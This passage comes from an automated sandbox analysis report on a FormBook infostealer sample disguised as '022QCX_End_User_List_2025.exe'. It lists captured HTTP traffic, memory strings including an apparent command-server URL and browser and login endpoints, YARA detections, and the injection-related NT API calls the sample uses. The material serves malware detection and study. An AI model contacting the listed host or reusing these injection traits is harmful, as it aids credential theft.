Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Jan 2025 06:52:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 22 Jan 2025 06:53:00 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 22 Jan 2025 06:53:03 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 22 Jan 2025 06:53:06 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Wed, 22 Jan 2025 06:53:08 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741099103.000000000626E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: gJe493hPOgj2OnF5.exe, 00000008.00000002.2942300801.00000000056F6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.corellia.pro
                Source: gJe493hPOgj2OnF5.exe, 00000008.00000002.2942300801.00000000056F6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.corellia.pro/eee1/
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: 022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: secinit.exe, 00000007.00000002.2938814440.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: secinit.exe, 00000007.00000002.2938814440.000000000348A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: secinit.exe, 00000007.00000002.2938814440.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: secinit.exe, 00000007.00000002.2938814440.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: secinit.exe, 00000007.00000002.2938814440.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: secinit.exe, 00000007.00000003.2251163027.0000000008159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.022QCX_End_User_List_2025.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2063942175.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2942300801.0000000005680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058828430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938382440.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940757113.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2940659392.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2940387871.0000000003480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2066777958.0000000001FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_0042CB93 NtClose,2_2_0042CB93
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2B60 NtClose,LdrInitializeThunk,2_2_012E2B60
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_012E2DF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012E2C70
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E35C0 NtCreateMutant,LdrInitializeThunk,2_2_012E35C0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E4340 NtSetContextThread,2_2_012E4340
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E4650 NtSuspendThread,2_2_012E4650
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2BA0 NtEnumerateValueKey,2_2_012E2BA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2B80 NtQueryInformationFile,2_2_012E2B80
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2BE0 NtQueryValueKey,2_2_012E2BE0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2BF0 NtAllocateVirtualMemory,2_2_012E2BF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2AB0 NtWaitForSingleObject,2_2_012E2AB0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2AF0 NtWriteFile,2_2_012E2AF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2AD0 NtReadFile,2_2_012E2AD0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2D30 NtUnmapViewOfSection,2_2_012E2D30
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2D00 NtSetInformationFile,2_2_012E2D00
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2D10 NtMapViewOfSection,2_2_012E2D10
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2DB0 NtEnumerateKey,2_2_012E2DB0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2DD0 NtDelayExecution,2_2_012E2DD0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2C00 NtQueryInformationProcess,2_2_012E2C00
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2C60 NtCreateKey,2_2_012E2C60
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2CA0 NtQueryInformationToken,2_2_012E2CA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2CF0 NtOpenProcess,2_2_012E2CF0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2CC0 NtQueryVirtualMemory,2_2_012E2CC0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2F30 NtCreateSection,2_2_012E2F30
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2F60 NtCreateProcessEx,2_2_012E2F60
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2FA0 NtQuerySection,2_2_012E2FA0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2FB0 NtResumeThread,2_2_012E2FB0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2F90 NtProtectVirtualMemory,2_2_012E2F90
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2FE0 NtCreateFile,2_2_012E2FE0
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2E30 NtWriteVirtualMemory,2_2_012E2E30
                Source: C:\Users\user\Desktop\022QCX_End_User_List_2025.exeCode function: 2_2_012E2EA0 NtAdjustPrivilegesToken,2_2_012E2EA0
